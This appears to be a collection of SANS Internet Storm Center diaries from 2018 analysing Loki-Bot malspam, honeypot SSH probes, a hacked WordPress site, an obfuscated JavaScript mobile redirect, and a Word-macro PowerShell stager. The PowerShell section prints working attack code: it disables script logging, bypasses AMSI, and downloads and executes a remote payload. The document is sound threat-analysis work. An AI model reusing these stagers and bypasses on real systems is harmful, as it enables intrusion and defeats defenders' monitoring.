Previously I discussed What’s On Your Not To Do List as a means to remain focused on priorities. I never fear running out of work in cybersecurity. Instead, I worry that our focus does not always stay on the most critical issues. Today I want to highlight several techniques I use to help remain effective.

Saying no

    Over and over again

    No can be a complete sentence

    Opportunity cost associated with time spent on other items

Calendar Margin

    Create space for unexpected tasks

    Make appointments for what matters most    

Goal tracking system

    As an achiever, I enjoy checking items off my "to do” list

    Evernote as a repository to hold ideas for future research

    Keep from cluttering up my brain

A physical planner

    Found tremendous value in weekly reviews

    Focus on what I accomplished

    And what needs even more focus

Each of these tactics serves to help keep me focused on what matters most. What hacks do you use to stay effective throughout your busy day? Let us know in the comments section!

Russell Eubanks

ISC Handler

SANS Instructor

@russelleubanks

Introduction

A tweet last week by @malwareunicorn reminded me I haven't searched out any Loki-Bot malspam in a while.

Shown above:  This tweet gave me a good chuckle.

Loki-Bot (also spelled "Loki Bot" or "LokiBot") is an information stealer that sends login credentials and other sensitive data from an infected Windows host to a server established for each malware sample.  It's commonly distributed through malicious spam (malspam), and I usually run across samples of Loki-Bot every day.  More information can be found in a SANS Reading Room paper written by Rob Pantazopoulos here.

I've already written two ISC diaries on Loki-Bot since October 2017 (here and here).  Today's diary is a reminder that Loki-Bot is very much alive and actively distributed through malspam on a daily basis.  You'll frequently find tweets tagged #Lokibot on Twitter.

Details

I often find examples of Loki-Bot malspam through VirusTotal Intelligence.  A quick search revealed one such email in the early hours of Monday 2018-06-11 (UTC time).  It was heavily sanitized, so there's little information other than the date, sender, subject line, and attachment.

Shown above:  The email I pulled from VirusTotal Intelligence.

The email has an RTF attachment disguised as a Word document.  When opened with a vulnerable version of Microsoft Office, an exploit for CVE-2017-11882 will download and install Loki-Bot malware on a vulnerable Windows host.  In this case, a request for the Loki-Bot executable was done over HTTPS.  Approximately two minutes later, the infected Windows host began generating post-infection HTTP traffic associated with Loki-Bot.

Shown above:  Traffic from the infection filtered in Wireshark.

Shown above:  HTTPS request for the Loki-Bot binary shown in Fiddler.

Shown above:  Loki-Bot executable on my infected Windows host.

Shown above:  Windows registry entry to keep Loki-Bot persistent on my infected host.

Indicators

Indicators are not the same as a block list.  If you need to block the associated web traffic, block anything going to these two domains:

• oceanlinkmarrine.com
• service-sbullet.com

Information from the malicious spam:

• Date: Sunday, 11 Jun 2018 01:05 UTC
• From: "Gold Link Logistics" <c37120b2324@fb90cfa11840.tr>
• Subject: Re: Aw: Aw: Shipping Documents
• Attachment Name: shipping documents.doc

Traffic from an infected Windows host:

• 108.163.221.2 TCP port 443 (HTTPS) - service-sbullet.com - GET /images/mg2/m.exe
• 45.122.138.6 TCP port 80 (HTTP) - oceanlinkmarrine.com - POST /loki4/fre.php

Associated malware:

SHA256 hash: b66d5b28c57517b8b7d2751e30e5175149479e5fde086b293a016aac11cdd546

• File size: 7,347 bytes
• File name: shipping documents.doc
• File description: RTF exploiting CVE-2017-11882 disguised as a Word document

SHA256 hash: a747eeac9ae8ee9317871dfaa2a368f2e82894f601a90614da5818f8f91d1d78

• File size: 667,648 bytes
• File location: hxxp://service-sbullet.com/images/mg2/m.exe
• File description: Windows executable file for Lokibot

Shown above:  Try searching both oceanlinkmarrine.com and service-sbullet.com for more info.

Final words

As usual, properly-administered and up-to-date Windows hosts are not likely to get infected.  System administrators and the technically inclined can also implement best practices like Software Restriction Policies (SRP) or AppLocker to prevent these types of infections.

Pcap and malware samples for today's diary can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

June 2018 Security Updates

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|

We've found interesting new traffic within our Honeytrap agents, originating from servers within Russia only (to be specific, the netblock owned by NKS / NCNET Broadband). The username and password combination being used is root / root, and they are executing all of the following ssh commands:

/ip cloud print
help
ifconfig
uname -a
show ip
cat /proc/cpuinfo
uptime
ls -la
ls /data/data/com.android.providers.telephony/databases
echo Hi | cat -n
ps | grep '[Mm]iner'
ps -ef | grep '[Mm]iner'

While searching for the "/ip cloud print" command,  I've found this command to be related to Microtik routers. Since RouterOS v6.27 the command has been changed, so the targetted devices are Microtik routers running RouterOS before v6.27. The username and password pair being used to gain access isn't a specific Microtik default username / password combination.

Because not all of the above commands are programmed to return the output expected by the script, it could be just probing for specifics about the attacked server.

One command we are not seeing very often is the check for Android databases, "ls /data/data/com.android.providers.telephony/databases". This is a bit weird, especially because of the combination RouterOS / Android, but it could be that the script is just trying to identify the os the device is running.

Another interesting command is the "echo Hi | cat -n" which just counts the number of output lines the echo command, which could be all fingerprinting. There is also a check for running miner processes, but we have seen more thorough checks in for example the Redis worm.

All ip addresses are located roughly at the same netblock / location, which could be an indication that this worm / script is explicitly targetting a vulnerability in the routers being used by the provider, while scanning a broader area not limited to their netblock(s).

Complete list of source addresses:

178.140.147.32
178.140.219.221
178.140.34.125
188.255.18.44
188.255.81.2
188.32.136.109
188.32.213.175
37.110.106.231
37.110.40.221
37.110.82.81
37.110.84.127
37.204.101.93
37.204.104.247
37.204.164.191
37.204.225.46
37.204.253.200
37.204.5.142
46.242.37.169
46.242.4.236
46.242.63.75
5.228.185.9
5.228.214.22
5.228.246.91
77.37.145.89
77.37.149.50
77.37.230.37
77.37.236.152
77.37.237.82
77.37.247.102
90.154.76.78
95.84.212.217

Let me know if you have additional information about this case.

Remco Verhoef (@remco_verhoef)
ISC Handler - Founder of DutchSec
PGP Key

A few days ago, one of our readers contacted reported an incident affecting his website based on Wordpress. He performed quick checks by himself and found some pieces of evidence:

• The main index.php file was modified and some very obfuscated PHP code was added on top of it.
• A suspicious PHP file was dropped in every sub-directories of the website.
• The wp-config.php was altered and database settings changed to point to a malicious MySQL server.

The strange PHP file (called “thnxx.php”) discovered in multiple directories was easy to spot. It is a web shell (SHA256:4eb36a7229f7a799ac321b989e12b4007df8d86057752cb182f409f32c4b4fec) with a nice score on VT: 2/58[1]. This web shell is in the wild for some time and used by many Indonesian hacker groups. There are plenty of Google hits[2][3].

The PHP code added to the index.php is pretty well obfuscated and performs the following tasks.

First, it modifies the .htaccess file and adds the following lines:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .*.html?$ index.php [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

What do they mean? Basically, if a visitor tries to access *any* page or directory that does not exist, it will be redirected to the index.php page.

Then, the site_map.xml file is generated with plenty of random URLs:

<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<url><loc>http://www.xxxxxx.com/cDZEMTE4NU82dTc1ODQ1RHZ5Mzlo</loc><lastmod>2018-06-07</lastmod><changefreq>weekly</changefreq></url>
<url><loc>http://www.xxxxxx.com/6vv1185Yvv75846by39h0</loc><lastmod>2018-06-07</lastmod><changefreq>weekly</changefreq></url>
<url><loc>http://www.xxxxxx.com/dnl2MTE4NVl5djc1ODQ3YjM5aDAw</loc><lastmod>2018-06-07</lastmod><changefreq>weekly</changefreq></url>
<url><loc>http://www.xxxxxx.com/y3u1185qN75848C</loc><lastmod>2018-06-07</lastmod><changefreq>weekly</changefreq></url>
<url><loc>http://www.xxxxxx.com/Mzl1MTE4NXFONzU4NDlD</loc><lastmod>2018-06-07</lastmod><changefreq>weekly</changefreq></url>
<url><loc>http://www.xxxxxx.com/9h0p1185xh0b75850O</loc><lastmod>2018-06-07</lastmod><changefreq>weekly</changefreq></url>  

Introduced by Google, the Sitemaps protocol to help web developers to publish lists of links across their sites. The Sitemap files contain URLs to these pages so that web crawlers can find them. Bing, Google, Yahoo and Ask now jointly support the Sitemaps protocol[4].

Combined with the .htaccess described above, this will redirect all the traffic to the index.php page. If the traffic is coming from a crawler or the referer is a search engine, a spam page is displayed:

if (isset($_SERVER['HTTP_USER_AGENT']) && preg_match('/(googlebot|yahoo|slurp|baiduspider|bingbot|google|baidu|aol|bing)/si', $_SERVER['HTTP_USER_AGENT'])) { }

if (isset($_SERVER['HTTP_REFERER']) && preg_match('/(google.co.jp|yahoo.co.jp|bing.com)/si', $_SERVER['HTTP_REFERER'])) { }

Note that Japanese versions of the crawlers or search engine are targeted. Here is an example of the page displayed to the visitor:

What about the altered wp-config.php? It’s the first time that I see this behaviour. The database configuration in wp-config.php has been changed:

define('DB_NAME', 'leticiaale’);
define('DB_USER', 'leticiaale’);
define('DB_PASSWORD', ‘xxxxxxxxxxx’);
define('DB_HOST', ‘dbmy0052.xxxxxxxxx’);
$table_prefix  = 'wp_torsia4';

The MySQL host has a PHPMyAdmin interface available. Let's use the credentials from the wp-config.php:

The next step was to investigate the "new" database used. I was able to dump a copy of the ‘leticiaale’ database (it took a few hours due to the bad connectivity with the host):

$ mysqldump -u leticiaale -p -h xxxxxxxx leticiaale >dump.sql

The security of the database is very weak. Personally I would restrict access to the database to the compromized servers only. I said "serverS" because the database dump contained multiple Wordpress databases with different table prefixes. I extracted all Wordpress home URLs from the dump file:

$ grep siteurl dump.sql |awk -F ',' '{ print $3 }'|tr -d "'" >urls.tmp
$ wc -l urls.tmp
     519 urls.tmp

519 compromized websites! Some of them were already cleaned, others are still running the malicious databases. Let's inspect one of the malicious database. The Wordpress settings are almost the default ones, with the default Wordpress post and one admin user:

LOCK TABLES `wp_torsia4users` WRITE;
/*!40000 ALTER TABLE `wp_torsia4users` DISABLE KEYS */;
INSERT INTO `anacapit29users` VALUES (1,'hamconage','$P$BbTujEbiRE2HQeLcmiXXXXXXXXXXXX.','hamconage','hamconage@hotmail.com','','2018-06-10 13:02:33','',0,'hamconage');
/*!40000 ALTER TABLE `wp_torsia4users` ENABLE KEYS */;
UNLOCK TABLES;

It seems also that a specific plugin is installed. Let's import the database in a sandbox running a Wordpress. The default page looks normal:

Let's change the 'hamconage' hash password in the database and connect to the Wordpress admin dashboard, you can see the malicious plugin "UBH" or "United Bangladeshi Hackers":

The next question is: how did the attacker compromise the Wordpress instance (fully patched, according to our reader)? He was able to get Apache logs from his hosting company and provided them to us. Let’s build a timeline of the accesses. It was easy to spot multiple POST requests to xmlrpc.php around the 7th of June. If the server was fully patched, the xmlrcp.php might have been brute forced but I did not see a lot of attempts. Or the password was very weak? A good recommendation is to enable logging of POST data or to enable full packet capture to be sure to investigate the complete HTTP flows. I found reference to the same hack already in March 2018 with a peak end of May 2018.

If you have more information about this attack, feel free to share!

[1] https://www.virustotal.com/#/file/4eb36a7229f7a799ac321b989e12b4007df8d86057752cb182f409f32c4b4fec/detection
[2] https://www.google.com/search?q=intitle:"JINGKLONG+BAJINGAN”
[3] https://www.google.com/search?q=Psycho00.dat
[4] https://en.wikipedia.org/wiki/Site_map

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

We received an email today that provided some interesting information from a reader (Bjorn) about some observed SMTP traffic that was unusal.  From the appearance it could be related to exfil or C2.  The domain in question is donotspamtoday.com whose IP is 185.14.30.147 and there is an DNS TXT entry for SPF.  The domain was registered March 20, 2018.  I have been unable to find any additional examples or information of similar traffic.

Bjorn provided a good analysis of what was observed and I'd like to pass it along to see if anyone is seeing or has seen traffic similar to this. Here is what he sent to us:  

multiple compromised mail accounts being abused for some kind of covert channel communication. These are the common denominators in the mail communication:

* Mail is submitted to the domain donotspamtoday.com, with a lowercase first name and single digit as local part of the address (kevin1@, joan4@, willy3@ etc)

* When sending mail, the client identifies with a HELO name of 10 random lowercase characters (helo=<ckvcjsgffo>, helo=<uhtcpnyawr>, helo=<mjjrdvztxq> etc)

* The mail's Subject is always three (3) garbled/hashed words, followed by MID: and 32 hex characters. Some examples:

Subject: tjx gxtew kfzmmi MID:b5d479449a955af149e251860092b089
Subject: yjlp tahfhg bhj MID:2067087fb3e302fbd357bc7ccfe2b495
Subject: oezdvlh nbqhhd smbhmh MID:88664d1750835a08d2594ab3fba92751
Subject: kiyeax ggsqfeb aucilpi MID:ac6b795067515742c5f8e025c2c3dff0
Subject: tqorgfj crngne jwkbljt MID:b86c50466b75f5b2a088365f60c87bdc
Subject: jhwz nchfa ujk MID:0178f3e6a51e6e4ad44baa0e54ba42cb
Subject: obem jzmep nju MID:1f22a1aa5038b0921874567d0f4a3012
Subject: zqfn gkdepn vjyuu MID:1696a6720ad44f8c38084eb923127f5e
Subject: ghod ttfq dqge MID:af8cad81ecaf028ad8019280d03f6a2b

* Each mail body contains exactly one line of eight hashed words. The words in the mail body are different from the words in the subject. Some examples (one line from each mail):

zjmviov rdktiw ovzdebu ysm htp kzhfsk escngpg oqcru
nklnhk lidwen qeujgbe lcrz krf xufkyb xqpjqbg nto
gcbvqzq dca wlfig prgrkg hmbzjn yxl uov lxwak
cxkw jnv vezxdkz sfvib rqnyze fqkfwgs memck cwm

* Most clients sending the mails connect from Brazil, but some connect from Iran, Turkey and others. The IPs observed exposing this behaviour are registered with Open Threat Exchange, https://otx.alienvault.com/pulse/5b2215e2eeaaee019b4e017b

If anyone has any additional information or is seeing this traffic, please let us know.  
 

Lorna Hutcheson
ISC Handler

When, in October and November's posts, I redefined DFIR under the premise of Deeper Functionality for Investigators in R, I discovered a "tip of the iceberg" scenario. To that end, I'd like to revisit the concept with an additional discovery and opportunity. In reality, this is really a case of DFIR (Deeper Functionality for Investigators in R) within the general practice of the original and paramount DFIR (Digital Forensics/Incident Response).

As discussed here before, those of us in the DFIR practice, and Blue Teaming at large, are overwhelmed by data and scale. Success truly requires algorithmic methods. If you're not already invested here I have an immediately applicable case study for you in tidy anomaly detection with anomalize.

First, let me give credit where entirely due for the work that follows. Everything I discuss and provide is immediately derivative from Business Science (@bizScienc), specifically Matt Dancho (@mdancho84). He created anomalize, "a tidy anomaly detection algorithm that’s time-based (built on top of tibbletime) and scalable from one to many time series," when a client asked Business Science to build an open source anomaly detection algorithm that suited their needs. I'd say he responded beautifully, when his blogpost hit my radar via R-Bloggers it lived as an open tab in my browser for more than a month until generating this toolsmith. Please consider Matt's post a mandatory read as step one of the process here. I'll quote Matt specifically before shifting context: "Our client had a challenging problem: detecting anomalies in time series on daily or weekly data at scale. Anomalies indicate exceptional events, which could be increased web traffic in the marketing domain or a malfunctioning server in the IT domain. Regardless, it’s important to flag these unusual occurrences to ensure the business is running smoothly. One of the challenges was that the client deals with not one time series but thousands that need to be analyzed for these extreme events."

Key takeaway: Detecting anomalies in time series on daily or weekly data at scale. Anomalies indicate exceptional events.

Now shift context with me to security-specific events and incidents, as the pertain to security monitoring, incident response, and threat hunting. In my November 2017 post, recall that I discussed Time Series Regression with the Holt-Winters method and a focus on seasonality and trends. Unfortunately, I couldn't share the code for how we applied TSR, but pointed out alternate methods, including Seasonal and Trend Decomposition using Loess (STL):

• Handles any type of seasonality ~ can change over time
• Smoothness of the trend-cycle can also be controlled by the user
• Robust to outliers

Last I had to analyze a malicious, encrypted Excel document, with a twist.

It was using the encrypted file format for OOXML files (.docx, .xlsx, ...), I knew this because of oledump's report:

When an OOXML file is encrypted, it is stored inside an OLE file. Stream EncryptedPackage contains the encrypted document.

Malware authors will encrypt malicious documents to avoid detection, but it requires the victim to type the password when opening the document. And that was different with this spreadsheet when I analyzed it inside a sandbox: no password was required to open it.

It turns out that this document was encrypted with password 'VelvetSweatshop'.

Allegedly, VelvetSweatshop was an hardcoded password in old versions of Excel used for protecting spreadsheets. For compatibility reasons, the latest versions of Excel still support this password. Spreadsheets encrypted with this password, will be opened by Excel without prompting the user for a decryption password.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

A reader reported a suspicious piece of a Javascript code that was found on a website. In the meantime, the compromized website has been cleaned but it was running Wordpress (again, I would say![1]). 

The code was obfuscated, here is a copy:

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, 
»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, 
»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », 
»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){
(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|
up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|
bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|
ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|
hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|
50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|
mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|
owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|
to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|
w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){
var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();
window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

The de-obfuscation is quite easy to perform. The most interesting part is in the array of hex-encoded strings.

Here is the de-obfuscated and beautified version:

if(document[cookie][indexOf](_mauthtoken) == -1) {
    (function(browserInfo, destinationUrl) {
        if (browserInfo[indexOf]("googlebot") == -1) {
            if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge
|maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|
vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](browserInfo)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|
bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|
hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|
jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|
qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|
sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|
tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|
vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[“test"](browserInfo[“substr"](0,4))) {
                var timeStamp = new Date(new Date()["getTime"]() + 1800000);
                document["cookie"] = "_mauthtoken=1; path=/;expires=" + timeStamp["toUTCString"]();
                window["location"] = destinationUrl
            }
        }
    }
    )
    (navigator["userAgent"]|| navigator["vendor"]|| window["opera"], "hxxp://gethere[.]info/kt/?264dpr&")
}

This code performs some verifications. If the following conditions are met, a cookie is created and the visitor is redirected to the URL present in the code.

• The cookie does not exist yet
• The visitor is not the Google crawler
• The visitor is using a mobile device/browser

If you try to access the URL directly, you will also need to present yourself as a mobile browser to get the next payload:

Nothing really malicious here, the visitor is redirected to a bunch of spam websites but keep in mind that such websites can also deliver much more malicious content like an exploit kit (it was not the case here).

[1] https://isc.sans.edu/forums/diary/A+Bunch+of+Compromized+Wordpress+Sites/23764/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

Here is an interesting piece of PowerShell code which is executed from a Word document (SHA256: eecce8933177c96bd6bf88f7b03ef0cc7012c36801fd3d59afa065079c30a559[1]). The document is a classic one. Nothing fancy, spit executes the macro and spawns a first PowerShell command:

powershell $h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','hxxps://pastebin[.]com/raw/dqHSgxmE',$false)
$h.send()
iex $h.responseText

The following payload is downloaded from Pastebin:

powershell -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAFIAcw ... (redacted) ... ACkAKQB8AEkARQBYAA==

The new Base64 script, once decoded, shows some interesting behaviours:

 1: IF ($PSVERsionTable.PSVErsIon.MaJor -Ge 3) {
 2:   $GPF=[rEf].AssembLY.GETTyPe('System.Management.Automation.Utils')."GETField"('cachedGroupPolicySettings','NonPublic,Static');
 3:    If ($GPF) {
 4:       $GPC=$GPF.GeTVAlUe($NuLl);
 5:        IF ($GPC['ScriptBlockLogging']) {
 6:           $GPC['ScriptBlockLogging']['EnableScriptBlockLogging']=0;
 7:            $GPC['ScriptBlockLogging']['EnableScriptBlockInvocationLogging']=0
 8:        }
 9:        $VAL=[CollEcTioNs.GeNEric.DIcTiOnARy[stRiNg,SysTem.OBJect]]::new();
10:        $VAL.ADD('EnableScriptBlockLogging',0);
11:        $VAL.AdD('EnableScriptBlockInvocationLogging',0);
12:        $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging']=$val
13:    }
14:   ELSE {
15:        [SCriPtBlOCk]."GEtFIElD"('signatures','NonPublic,Static').SETValue($NuLL,(New-OBjECt COllectIoNs.GeNeRIC.HasHSet[sTRINg]))
16:   }
17:   [Ref].ASSeMBly.GetTYpe('System.Management.Automation.AmsiUtils')|?{$_}|%{
18:        $_.GetFIEld('amsiInitFailed','NonPublic,Static').SETVaLUe($Null,$True)
19:   };
20: };
21: [SYStEM.Net.SERVIcEPOINtMANagEr]::ExPEcT100CoNtInUE=0;
22: $Wc=New-OBjECt SYsTEm.NeT.WEbCLIENt;
23: $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
24: $wC.HEadERS.AdD('User-Agent',$u);
25: $wc.PROXy=[SYSTEM.Net.WebREqueSt]::DefaUlTWEbPROXy;
26: $Wc.ProXY.CrEDeNTIALS = [SyStEm.Net.CredenTIaLCAcHE]::DeFAuLtNeTWORKCreDenTiALS;
27: $Script:Proxy = $wc.Proxy;
28: $K=[SYsTeM.Text.ENCOdING]::ASCII.GetBytES('C>)hu9my~n#X}oG^0NkW1%b3xTSwOpVH');
29: $R={
30:    $D,$K=$ARgs;
31:   $S=0..255;0..255|% {        $J=($J+$S[$_]+$K[$_%$K.COUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]   };
32:    $D|%{
33:        $I=($I+1)%256;
34:        $H=($H+$S[$I])%256;
35:        $S[$I],$S[$H]=$S[$H],$S[$I];
36:        $_-BxOR$S[($S[$I]+$S[$H])%256]
37:    }
38: };
39: $ser='hxxp://190[.]101[.]22[.]94:9090';
40: $t='/news.php';
41: $WC.HEadeRs.AdD("Cookie","session=m0z8td9ZwUX+sHk/aQ7cLxIg7hI=");
42: $DaTa=$WC.DOWnlOadDAta($ser+$t);
43: $IV=$daTA[0..3];
44: $DaTa=$dAta[4..$dATa.LenGTh]
45: ;-Join[ChAr[]](& $R $DaTA ($IV+$K))|IEX

From line 1 to 20, we see a technique used by attackers to disable the ScriptBlock logging feature introduced by Microsoft in Windows 10[2]. The ScriptBlock logging feature is a pain for attackers because blue teams have access to full logs recording all of an attacker’s malicious PowerShell activity.  ScriptBlock logging is enabled through a Group Policy setting. PowerShell, for each new script block detected, will verify if it must be logged or not. Too bad, it has been proven that this feature can be bypassed without administrator privileges[3]. After disabling this logging feature, the script fetches the proxy config to access the Internet (line 25 to 27). Another classic behaviour, the access to the remote site (hxxp://190[.]101[.]22[.]94:9090/news.php) is probably restricted based on the User-Agent string (line 23) and the session cookie (line 41). The last payload is decrypted (line 28 to 38) and executed (line 43 to 45).

Interesting fact, I found other references to the same script but with different values for the "session" cookie and the $K encoded data (line 28). It could mean that the website might be involved in multiple attack campaigns (the session cookie is a nice way to identify the campaign or the victim profile).

The IP address %%ip:190.101.22.94%% is not reachable but it looks to be delivering a PowerShell Empire payload.

[1] https://www.virustotal.com/#/file/eecce8933177c96bd6bf88f7b03ef0cc7012c36801fd3d59afa065079c30a559/detection
[2] https://docs.microsoft.com/en-us/powershell/wmf/5.0/audit_script
[3] https://cobbr.io/ScriptBlock-Logging-Bypass.html

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

Phishing for Netflix accounts isn't new. But recently, I see a large number of phishing e-mails for Netflix that lead to sites with valid TLS certificates.

